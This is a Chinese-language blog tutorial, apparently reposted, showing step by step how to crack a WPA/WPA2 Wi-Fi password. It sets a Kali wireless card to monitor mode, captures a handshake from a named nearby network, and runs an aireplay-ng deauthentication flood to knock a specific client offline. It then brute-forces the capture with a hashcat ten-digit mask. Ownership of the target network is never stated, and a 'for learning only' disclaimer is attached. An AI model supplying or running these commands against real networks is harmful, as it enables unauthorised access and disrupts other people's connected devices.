Kali Aircrack-NG HashCat 破解Wi-Fi密碼
假日無(wú)事,某網(wǎng)站購(gòu)入TL-WN722N Kali免驅(qū)網(wǎng)卡,掃描一下附近網(wǎng)絡(luò)試試
僅學(xué)習(xí)使用
1.設(shè)備概要
- TL-WN722N Kali免驅(qū)網(wǎng)卡
- MacBook Pro (Parallels Desktop)
- Kali鏡像 https://www.kali.org/get-kali/
- 個(gè)人博客: https://blog.ztfot.com/?p=290
2.破解WPA/WPA2類(lèi)WI-FI操作(Root下操作):
用Parallels Desktop 安裝Kali Linux,并且接入無(wú)線(xiàn)網(wǎng)卡
2.1查看可用無(wú)線(xiàn)網(wǎng)卡
airmon-ng
2.2啟用網(wǎng)卡監(jiān)聽(tīng)模式
airmon-ng start wlan0
使用iwconfig
確認(rèn)已經(jīng)開(kāi)啟網(wǎng)卡監(jiān)聽(tīng)模式,主要表現(xiàn)是,網(wǎng)卡名稱(chēng)wlan0變?yōu)閣lan0mon, Mode:Monitor
2.3掃描周?chē)鶺i-Fi
airodump-ng wlan0mon
BSSID -- Wi-Fi的Mac地址
PWR -- 信號(hào)強(qiáng)度
Data -- 監(jiān)聽(tīng)期間流量總和
CH -- WI-FI所用信道
ENC -- 加密算法
ESSID -- Wi-Fi名稱(chēng)
- 看到需要破解的WI-FI按下Ctrl +C 終止
我們的目標(biāo)名是ChinaNet-zLAp
BSSID : 8C:53:C3:DA:77:F7 CH : 6
2.4抓取握手包并保存為CAP文件
airodump-ng --bssid 8C:53:C3:DA:77:F7 -c 6 -w /root/ChinaNet-zLAp wlan0mon
# -bssid 指定要破解的WI-FI BSSID 值
# -c 指定要破解的Wi-Fi的信道
# -w 捕獲到的握手包文件名
2.5 主動(dòng)對(duì)設(shè)備斷網(wǎng)獲取握手包
上一步中我們是被動(dòng)等待
(以前我沒(méi)有kali linux以及網(wǎng)卡的時(shí)候,MacBook就一直掛著等待很久很久~~)
但對(duì)于上面已經(jīng)連上Wi-Fi的設(shè)備,我們可以使用aireplay-ng
進(jìn)行deauth洪水攻擊
使其設(shè)備掉線(xiàn),掉線(xiàn)的設(shè)備會(huì)自動(dòng)重新連上Wi-Fi,此時(shí)我們就可以獲得握手包
保持上步抓包命令不中斷,新開(kāi)一個(gè)窗口執(zhí)行(我們選取信號(hào)最好的 PWR = -12 ):
aireplay-ng -0 10 -a 8C:53:C3:DA:77:F7 -c 28:6C:07:29:D9:A2 wlan0mon
# -0 表示斷開(kāi)設(shè)備連接
# 10 表示deauth攻擊次數(shù)
# -a 為Wi-Fi的BSSID
# -c 表示讓連接設(shè)備失效的設(shè)備BSSID地址,為上圖中STATION地址
上圖為洪水攻擊過(guò)程(攻擊過(guò)程十分明顯,因?yàn)槲疫B網(wǎng)的智能臺(tái)燈熄滅重啟了)
如圖所示,我們已經(jīng)抓到了重新認(rèn)證的 28:6C:07:29:D9:A2
的握手包,使用Ctrl +C
終止抓包
此時(shí)會(huì)在指定目錄下產(chǎn)生文件(每次抓包后會(huì)產(chǎn)生一組,留意數(shù)字為第幾次執(zhí)行的)
3.暴力破解CAP文件
字典配合Aircrack-ng
效率有點(diǎn)低(CPU破解),所以我們使用HashCat
(GPU)破解WPA/WPA2
的握手包
由于HashCat
無(wú)法直接破解CAP
文件,所以我們得將其轉(zhuǎn)化為HCCAPX
文件
去官網(wǎng)轉(zhuǎn)換,https://hashcat.net/cap2hccapx/ 如圖
或者使用工具(hashcat-utils的cap2hccapx):
下載地址:https://github.com/hashcat/hashcat-utils/releases/
cd hashcat-utils-1.9/bin && chmod +x cap2hccapx.bin
將CAP文件轉(zhuǎn)化為HCCAPX文件:
- 因?yàn)樽グ撕脦状?,所以這里出現(xiàn)3個(gè),只要有其中的一個(gè)就可以了,如果沒(méi)有,那就是抓包失敗了
3.1使用HashCat破解
- 找了一臺(tái)有獨(dú)顯的筆記本,MacBook核顯計(jì)算??..
hashcat -a 3 -m 2500 ChinaNet-zLAp-01.hccapx "?d?d?d?d?d?d?d?d?d?d"
# -a attack_mode [ 0 Straight(字典破解) 1 Combination(組合破解) 3 Brute-force(掩碼暴力破解)]
# -m 2500 破解WPA2 hccapx文件
#'?d' 一個(gè)'?d'表示一個(gè)數(shù)字,我這里是10位數(shù)數(shù)字密碼,常用掩碼類(lèi)型如下:
# ? | Charset
# ===+=========
# l | abcdefghijklmnopqrstuvwxyz
# u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
# d | 0123456789
# h | 0123456789abcdef
# H | 0123456789ABCDEF
# s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
# a | ?l?u?d?s
按下**’s’**了解最新破解信息(Wi-Fi是10位數(shù)數(shù)字密碼,GTX 850M 最久需要兩天。。)文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-608122.html
過(guò)了很久,密碼破解成功,如圖:文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-608122.html
到了這里,關(guān)于Kali Aircrack-NG HashCat 破解Wi-Fi密碼的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!